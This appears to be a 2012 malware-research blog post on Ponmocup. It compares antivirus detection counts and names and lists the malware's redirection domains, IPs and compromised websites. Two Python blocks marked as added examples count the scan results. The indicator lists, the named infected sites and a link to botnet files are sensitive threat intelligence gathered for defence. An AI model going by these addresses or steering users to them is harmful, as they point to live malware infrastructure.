<span style="font-size: 85%;"><span style="font-family: courier new;"> 20 Panda</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 NOD32</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 Ikarus</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 GData</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 F-Secure</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 Emsisoft</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 DrWeb</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 BitDefender</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 20 Avast</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 Norman</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 Kaspersky</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 Fortinet</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 Comodo</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 AntiVir</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 AhnLab-V3</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 19 AVG</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 18 TrendMicro-HouseCall</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 18 TrendMicro</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 18 Microsoft</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 18 K7AntiVirus</span><br style="font-family: courier 
new;" /><span style="font-family: courier new;"> 17 nProtect</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 17 VIPRE</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 17 McAfee-GW-Edition</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 17 McAfee</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 17 Jiangmin</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 15 VirusBuster</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 15 Symantec</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 15 Sophos</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 14 VBA32</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 14 TheHacker</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 14 PCTools</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 11 F-Prot</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 11 Commtouch</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 10 SUPERAntiSpyware</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 9 Rising</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 9 ClamAV</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 9 Antiy-AVL</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 eTrust-Vet</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 ViRobot</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 6 ByteHero</span><br style="font-family: courier new;" /><span 
style="font-family: courier new;"> 5 eSafe</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 3 CAT-QuickHeal</span></span><br />
<br />
And the detection names, with the number of samples each engine assigned to them:<br />
<br />
<span style="font-size: 85%;"><span style="font-family: courier new;"> 1 AVG = Downloader.Generic10.BMDC</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Downloader.Generic10.BOLE</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Downloader.Small.62.D</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Dropper.Generic4.BXSO</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 AVG = Dropper.VB.CMD</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Generic22.JDH</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Generic25.AFPK</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Generic25.AIJK</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Generic25.BRLU</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Generic25.BTFX</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Generic25.BTHJ</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AVG = Suspicion: unknown virus</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AhnLab-V3 = Trojan/Win32.HDC</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 2 AhnLab-V3 = Trojan/Win32.Jorik</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 1 AhnLab-V3 = Trojan/Win32.Monder</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 5 AhnLab-V3 = Trojan/Win32.Pirminay</span><br style="font-family: courier new;" /><span style="font-family: courier new;"> 8 AhnLab-V3 = Trojan/Win32.Swisyn</span><br style="font-family: courier new;" 
/></span><br />
<br />
Only one A/V product recognized more than half of the samples under a single detection name:<br />
<br />
<span style="font-size: 85%;"><span style="font-family: courier new;">16 Microsoft = TrojanDownloader:Win32/Ponmocup.A</span></span><br />
<br />
The MD5 hashes of the samples are:<br />
<br />
<br />
And here are some <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/VirusShare/Ponmocup-AV-detections.txt">more file details</a>.<br />
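The two summaries in this post (the per-engine detection-name counts and the number of detections per engine) are straightforward to reproduce from raw multi-engine scan results, and the "more than half the samples under one name" check is the interesting part, because a vendor that spreads its verdicts over many generic names gives no usable family label. The Python below is an added example, not code from the original post: the engine and detection names are borrowed from the post, the per-sample scan results and MD5s are constructed placeholders, and it assumes the post's denominator (all samples, not only the ones an engine detected).

```python
"""Aggregate multi-engine scan results the way the post does.

Added example, not code from the original post.  It (1) counts each
(engine, detection name) pair, (2) counts how many samples each engine
flags at all, (3) parses the post's '<n> Engine = Name' summary format,
and (4) lists engines whose single most common name covers more than
half of the samples.  The scan data is constructed: engine and detection
names come from the post, the MD5 strings are placeholders.
"""
import re
from collections import Counter

# Constructed input: one entry per sample, engine -> detection name
# (None = the engine did not flag the file).  MD5s are placeholders.
SCAN_RESULTS = [
    {"md5": "md5-placeholder-1", "scans": {
        "Microsoft": "TrojanDownloader:Win32/Ponmocup.A",
        "Kaspersky": "Trojan.Win32.Swisyn.jyb", "Sophos": "Mal/Swisyn-D", "Panda": None}},
    {"md5": "md5-placeholder-2", "scans": {
        "Microsoft": "TrojanDownloader:Win32/Ponmocup.A",
        "Kaspersky": "Trojan.Win32.Swisyn.jyb", "Sophos": "Mal/Swisyn-D", "Panda": "Generic Trojan"}},
    {"md5": "md5-placeholder-3", "scans": {
        "Microsoft": "TrojanDownloader:Win32/Ponmocup.A",
        "Kaspersky": "Trojan.Win32.Pirminay.bg", "Sophos": "Mal/Ponmocup-A", "Panda": "Generic Trojan"}},
    {"md5": "md5-placeholder-4", "scans": {
        "Microsoft": "TrojanDownloader:Win32/Ponmocup.A",
        "Kaspersky": "Trojan.Win32.Pirminay.bhy", "Sophos": "Troj/Virtum-Gen", "Panda": None}},
    {"md5": "md5-placeholder-5", "scans": {
        "Microsoft": "TrojanDownloader:Win32/Ponmocup.A",
        "Kaspersky": "HEUR:Trojan.Win32.Generic", "Sophos": None, "Panda": None}},
    {"md5": "md5-placeholder-6", "scans": {
        "Microsoft": "TrojanDownloader:Win32/Renos.KC",
        "Kaspersky": "HEUR:Trojan.Win32.Generic", "Sophos": None, "Panda": None}},
]

# Layout of the summary lines in the post: "<count> <engine> = <name>"
SUMMARY_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s+=\s+(.+?)\s*$")


def name_counts(results):
    """Count (engine, detection name) pairs over all samples, skipping
    undetected entries.  This is the post's '<n> Engine = Name' list."""
    counts = Counter()
    for sample in results:
        for engine, name in sample["scans"].items():
            if name:
                counts[(engine, name)] += 1
    return counts


def detections_per_engine(results):
    """Number of samples each engine flagged, sorted like the post's
    '158 GData' list: most detections first, ties broken by engine name."""
    per_engine = Counter()
    for sample in results:
        for engine, name in sample["scans"].items():
            if name:
                per_engine[engine] += 1
    return sorted(((n, e) for e, n in per_engine.items()), key=lambda t: (-t[0], t[1]))


def parse_summary(text):
    """Parse '<count> <engine> = <name>' lines (the post's published format)
    into the same Counter that name_counts() builds, so the consistency
    check can run on the summary alone when raw results are not at hand."""
    counts = Counter()
    for line in text.splitlines():
        m = SUMMARY_LINE.match(line)
        if m:
            counts[(m.group(2), m.group(3))] += int(m.group(1))
    return counts


def consistent_engines(counts, total_samples, threshold=0.5):
    """Engines whose single most common name covers more than `threshold`
    of ALL samples -> {engine: (name, count)}.  The denominator is the whole
    sample set, not the engine's own detections, so an engine that splits
    its verdicts across many generic names does not qualify."""
    best = {}
    for (engine, name), n in counts.items():
        if engine not in best or n > best[engine][1]:
            best[engine] = (name, n)
    return {e: (name, n) for e, (name, n) in best.items()
            if n > threshold * total_samples}


def format_summary(counts):
    """Render the Counter in the post's '<n> Engine = Name' layout,
    sorted by engine and then by name (case-sensitive, as in the post)."""
    return "\n".join(f"{n:>3} {engine} = {name}"
                     for (engine, name), n in sorted(counts.items()))


if __name__ == "__main__":
    counts = name_counts(SCAN_RESULTS)
    print(format_summary(counts), end="\n\n")
    for n, engine in detections_per_engine(SCAN_RESULTS):
        print(f"{n:>4} {engine}")
    print("\nConsistent naming:", consistent_engines(counts, len(SCAN_RESULTS)))
```

Running it prints the two summaries for the constructed set and reports only Microsoft as consistent, which mirrors the result for the real 20-sample set above.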
<br />
<br />
<div style="color: blue;">
<span style="font-style: italic; font-weight: bold;">Updated 2012-05-13:</span></div>
<i style="color: blue;">I received the results for all 160 Ponmocup samples. See additional stats at the end.</i><br />
<br />
Here is the number of detections, out of 160 samples, for each A/V:<br />
<br />
<span style="font-size: small;"><span style="font-family: "Courier New",Courier,monospace;"> 158 GData</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 158 BitDefender</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">157 Ikarus</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 155 AntiVir</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 154 NOD32</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 153 F-Secure</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 151 AVG</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 149 Avast</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: cyan;">148 VIPRE</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 146 Panda</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">145 Microsoft</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 145 McAfee-GW-Edition</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 141 McAfee</span><br style="font-family: "Courier New",Courier,monospace;" /><span 
style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: cyan;">141 Comodo</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 140 AhnLab-V3</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 138 Sophos</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 138 Norman</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 137 nProtect</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: lime;">136 Kaspersky</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 134 TrendMicro-HouseCall</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 133 TrendMicro</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">133 Emsisoft</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 132 K7AntiVirus</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 130 Symantec</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 127 Jiangmin</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 124 PCTools</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier 
New",Courier,monospace;"> 123 TheHacker</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 123 Fortinet</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 114 VirusBuster</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 101 Avast5</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 100 DrWeb</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;"> 99 Antiy-AVL</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 88 VBA32</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 78 CAT-QuickHeal</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 65 SUPERAntiSpyware</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 55 F-Prot</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 55 Commtouch</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 52 Rising</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 46 eSafe</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 34 eTrust-Vet</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: 
"Courier New",Courier,monospace;"> 34 ViRobot</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 27 ClamAV</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 12 ByteHero</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 3 Prevx</span></span><br />
<br />
Here are the top 25 detection names, i.e. the number of samples an A/V flagged under the same name:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="font-size: small;"> <span style="background-color: yellow;">136 Microsoft = TrojanDownloader:Win32/Ponmocup.A</span><br /> <span style="background-color: yellow;">106 Ikarus = Trojan.Win32.Pirminay</span><br /> <span style="background-color: cyan;"> 96 VIPRE = Trojan.Win32.Generic!BT</span><br /> <span style="background-color: yellow;"> 86 Emsisoft = Trojan.Win32.Pirminay!IK</span><br /> <span style="background-color: cyan;"> 76 Comodo = TrojWare.Win32.Trojan.Agent.Gen</span><br /> <span style="background-color: yellow;"> 76 Antiy-AVL = Trojan/Win32.Pirminay.gen</span><br /> 74 Norman = W32/Obfuscated.L<br /> 70 Panda = Trj/CI.A<br /> 67 K7AntiVirus = Riskware<br /> 63 K7AntiVirus = Trojan<br /> 57 PCTools = Trojan.Gen<br /> 56 Sophos = Mal/Generic-L<br /> 52 Symantec = Trojan.Gen<br /> 34 Avast = Win32:Malware-gen<br /> 34 AhnLab-V3 = Trojan/Win32.Pirminay<br /> 32 Sophos = Mal/Ponmocup-A<br /> 32 NOD32 = Win32/TrojanDownloader.Agent.PXO<br /> 32 Comodo = UnclassifiedMalware<br /> 31 NOD32 = Win32/Qhost.NRX<br /> 31 DrWeb = Trojan.Hosts.303<br /> 30 eTrust-Vet = Win32/Swisyn.R<br /> 30 VirusBuster = Trojan.Swisyn!whPY1JLc4mw<br /> 30 ViRobot = Trojan.Win32.Swisyn.65024<br /> 30 VIPRE = Trojan.Win32.Swisyn.jyb (v)<br /> 30 TrendMicro-HouseCall = TROJ_FAM_00001e3.TOMA</span></div>
<br />
Some A/V use these common family names (Ponmocup, Pirminay, Swisyn) but append a variant suffix, which spreads the 160 samples across many names. Here is the number of distinct detection names per A/V:<br />
<br />
<span style="font-size: small;"><span style="font-family: "Courier New",Courier,monospace;"> 53 AhnLab-V3</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 40 AntiVir</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;"> 3 Antiy-AVL</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 10 Avast</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8 Avast5</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 56 CAT-QuickHeal</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 1 ClamAV</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 2 Commtouch</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: cyan;"> 1 Comodo</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;"> 4 Emsisoft</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 2 F-Prot</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 33 Fortinet</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;"> 4 Ikarus</span></span><br style="font-family: "Courier 
New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 57 Jiangmin</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: lime;">95 Kaspersky</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 1 McAfee</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 1 McAfee-GW-Edition</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;"> 1 Microsoft</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 2 NOD32</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 1 Panda</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 3 Sophos</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 60 TheHacker</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 2 TrendMicro</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 2 TrendMicro-HouseCall</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 45 VBA32</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: cyan;"> 2 VIPRE</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: 
"Courier New",Courier,monospace;"> 3 ViRobot</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 21 VirusBuster</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 1 eSafe</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 3 eTrust-Vet</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 58 nProtect</span></span><br />
<br />
Highlighted are some A/V with the most detections under <span style="background-color: yellow;">one well-known name</span>, some <span style="background-color: lime;">variants of a well-known name</span>, or some <span style="background-color: cyan;">generic name</span>.<br />
<br />
You can make of this statistic whatever you like.<br />
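As an added example (not code from the original post), here is how the three tables above can be computed from VirusTotal-style scan results. The scan records in it are constructed for the example and only reuse detection names that appear in the tables; the family-versus-generic split at the end is an extra heuristic of the example, not one of the post's tables:<br />

```python
"""Added example (not from the original post): reproduce the three statistics
tabulated above (detections per A/V, most common detection names, distinct
names per A/V) from VirusTotal-style scan results.  SCANS is CONSTRUCTED for
this example; the real data set behind the tables had 160 samples."""
from collections import Counter, defaultdict

# Constructed input: one dict per sample, engine name -> detection name
# (None = not detected).  Assumed shape: the "scans" object of a VirusTotal
# v2 report reduced to what the statistics need.
SCANS = [
    {"Microsoft": "TrojanDownloader:Win32/Ponmocup.A", "Ikarus": "Trojan.Win32.Pirminay",
     "Kaspersky": "Trojan.Win32.Pirminay.abc", "VIPRE": "Trojan.Win32.Generic!BT", "ClamAV": None},
    {"Microsoft": "TrojanDownloader:Win32/Ponmocup.A", "Ikarus": "Trojan.Win32.Pirminay",
     "Kaspersky": "Trojan.Win32.Pirminay.abd", "VIPRE": "Trojan.Win32.Generic!BT", "ClamAV": None},
    {"Microsoft": "TrojanDownloader:Win32/Ponmocup.A", "Ikarus": None,
     "Kaspersky": "Trojan-Downloader.Win32.Swisyn.jyb", "VIPRE": "Trojan.Win32.Swisyn.jyb (v)",
     "ClamAV": "Win.Trojan.Agent-1"},
    {"Microsoft": None, "Ikarus": "Trojan.Win32.Pirminay",
     "Kaspersky": "Trojan.Win32.Pirminay.abe", "VIPRE": None, "ClamAV": None},
]

FAMILIES = ("ponmocup", "pirminay", "swisyn")   # the well-known names used in the post


def _hits(scans):
    """Yield (engine, name) for every positive detection."""
    for scan in scans:
        for engine, name in scan.items():
            if name:
                yield engine, name


def detections_per_engine(scans):
    """Table 1: number of samples each engine flagged under any name."""
    return Counter(engine for engine, _ in _hits(scans))


def top_detection_names(scans, n=25):
    """Table 2: the n most frequent (engine, name) pairs."""
    return Counter(_hits(scans)).most_common(n)


def distinct_names_per_engine(scans):
    """Table 3: how many different names each engine used; a high number means
    the engine numbers variants instead of reusing one family name."""
    names = defaultdict(set)
    for engine, name in _hits(scans):
        names[engine].add(name)
    return {engine: len(s) for engine, s in names.items()}


def family_vs_generic(scans, families=FAMILIES):
    """Extra heuristic (not in the post): per engine, split detections into
    those carrying a well-known family name and the rest (generic names such
    as Trojan.Win32.Generic!BT).  Case-insensitive substring match."""
    split = defaultdict(lambda: {"family": 0, "other": 0})
    for engine, name in _hits(scans):
        kind = "family" if any(f in name.lower() for f in families) else "other"
        split[engine][kind] += 1
    return dict(split)


def format_table(counts):
    """Render a count table in the post's layout: right-aligned count, label,
    sorted by count (descending) and then by label."""
    rows = sorted(counts.items(), key=lambda kv: (-kv[1], str(kv[0])))
    return "\n".join(f"{n:3d} {label}" for label, n in rows)


if __name__ == "__main__":
    print(format_table(detections_per_engine(SCANS)), end="\n\n")
    print(format_table({f"{e} = {name}": n for (e, name), n in top_detection_names(SCANS)}), end="\n\n")
    print(format_table(distinct_names_per_engine(SCANS)), end="\n\n")
    print(family_vs_generic(SCANS))
```

To use it on real data, replace SCANS with the per-engine "result" fields of your own reports; engines that were absent from a report simply do not count, which is also why the totals per engine in the tables above differ.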
<br />
<br />
<div style="color: red;">
<span style="font-style: italic; font-weight: bold;">Updated 2012-05-30:</span></div>
<br />
Here is a list of Ponmocup redirection domains & IPs from April and May 2012:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace; font-size: small;">2012-04-02 *.americancollegefootballleague.com 178.211.33.203<br />2012-04-02 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-03 *.albinopleco.com 178.211.33.203<br />2012-04-03 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-04 *.3d-tablet.cc 77.79.11.96<br />2012-04-05 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-05 *.nnan.co 178.211.33.203<br />2012-04-10 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-10 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-11 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-11 (fckery)*.getbetweenthecovers.com 178.211.33.203<br />2012-04-12 *.3d-tablet.cc 77.79.11.96<br />2012-04-12 (fckery)*.getbetweenthecovers.com 178.211.33.203<br />2012-04-16 *.peachtreepropainters.biz 77.79.11.96<br />2012-04-19 *.learn2drive4free.com 178.211.33.203<br />2012-04-19 (ceprez)*.recycling-computers-portland.com 176.53.112.108<br />2012-04-24 *.pballgames.com 77.79.11.96<br />2012-04-24 *.thepetserver.com 77.79.11.96<br />2012-04-26 *.3d-tablet.cc 77.79.11.96<br />2012-04-27 *.albinopleco.com 178.211.33.203<br />2012-05-01 *.crisisice.com 77.79.11.96<br />2012-05-02 (beawnca)*.buildyourbankaccount.com 178.211.33.202<br />2012-05-03 *.arizonabettas.com 178.211.33.203<br />2012-05-03 *.arizonabettas.com 178.211.33.203<br />2012-05-03 *.akitahusky.net 77.79.11.96<br />2012-05-10 *.arizonabettas.com 178.211.33.203<br />2012-05-11 *.customshowerdoorandclosets.com 176.53.112.107<br />2012-05-11 (vrizasita)*.savegrady.com 178.211.33.203<br /><span style="color: blue;">2012-05-15 (fliboyshit)*.zk28wines.com 178.211.33.205</span><br style="color: blue;" /><span style="color: blue;">2012-05-18 (belchar)*.psychicreadingstexas.com 178.211.33.205</span><br style="color: blue;" /><span style="color: blue;">2012-05-18 (fliboyshit)*.zk28wines.com 178.211.33.205</span><br />2012-05-19 *.peachtreepropainters.biz 77.79.11.96<br />2012-05-22 
*.customshowerdoorandclosets.com 176.53.112.107<br /><span style="color: blue;">2012-05-23 (elianis)*.funfitnessconcepts.com 178.211.33.205</span><br />2012-05-24 *.learn2drive4free.com 178.211.33.203<br />2012-05-25 *.soroki.info 176.53.112.108<br />2012-05-25 *.3d-tablet.cc 77.79.11.96<br /><span style="color: blue;">2012-05-25 (derhana)*.ottawaapplianceservice.com 178.211.33.205</span><br style="color: blue;" /><span style="color: blue;">2012-05-29 (alqssas)*.kmpowersports.com 178.211.33.205</span></span><br />
<br />
Since <span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: blue;">2012-05-15</span></span> a new IP (<span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: blue;">178.211.33.205</span></span>) and several new domains have been in use.<br />
The "*" subdomain is in place of the source-port number (4 - 5 digits), but recently I've seen some random alpha-char subdomains (e.g. "<span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: blue;">fliboyshit</span></span><span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: blue;">.zk28wines.com</span></span>") which I've noted as "<span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: blue;">(random-alpha)*</span></span>".<br />
<br />
And here are some more infected servers: (malware-domain / infected-server-domain)<br />
<br />
Using "/cgi-bin/r.cgi" redirection pattern:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="font-size: small;">herocopter.com www.drdracingheads.com<br />earlyanswered.com skyfield.eu<br />earlyanswered.com www.thorenberg.ch<br />costslaid.com www.comedy-hamburg.de<br />teethalong.org www.brautwelt.com</span></div>
<br />
Using "/url" redirection pattern:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace; font-size: small;">turboldd.greensforum.com www.tanz-tschui.ch<br />64890.customshowerdoorandclosets.com www.novoglas.ch<br />elianis.funfitnessconcepts.com shop.wiltec.info<br />62708.dancearkansas.com www.westcoastsports.ca<br />40172.learn2drive4free.com www.autocamp-nordsee.com<br />61136.3d-tablet.cc www.europschool.net</span><br />
<span style="font-family: "Courier New",Courier,monospace; font-size: small;">54280.soroki.info citv.nl<br />derhana.ottawaapplianceservice.com www.zur-sonne.de<br />alqssas.kmpowersports.com www.real-art.ch</span><br />
<br />
The infection can still be verified with some online services like urlquery.net or Wepawet, as these examples show. (For this type of infection urlvoid.com is ineffective: it only aggregates blacklist and reputation lookups for the domain name and never fetches the page with the search-engine referer and browser user-agent that trigger the redirect, so it reports the site as clean.)<br />
<br />
<a href="http://www.urlvoid.com/scan/zur-sonne.de/">http://www.urlvoid.com/scan/zur-sonne.de/</a><br />
<span style="color: red;">Detections 0/32 (0.00%)</span><br />
<span style="color: red;">Status CLEAN</span> <b>-- is wrong!</b><br />
<br />
<a href="http://urlquery.net/report.php?id=61463">http://urlquery.net/report.php?id=61463</a><br />
<a href="http://urlquery.net/domainmap.php?id=61463">http://urlquery.net/domainmap.php?id=61463</a><br />
<br />
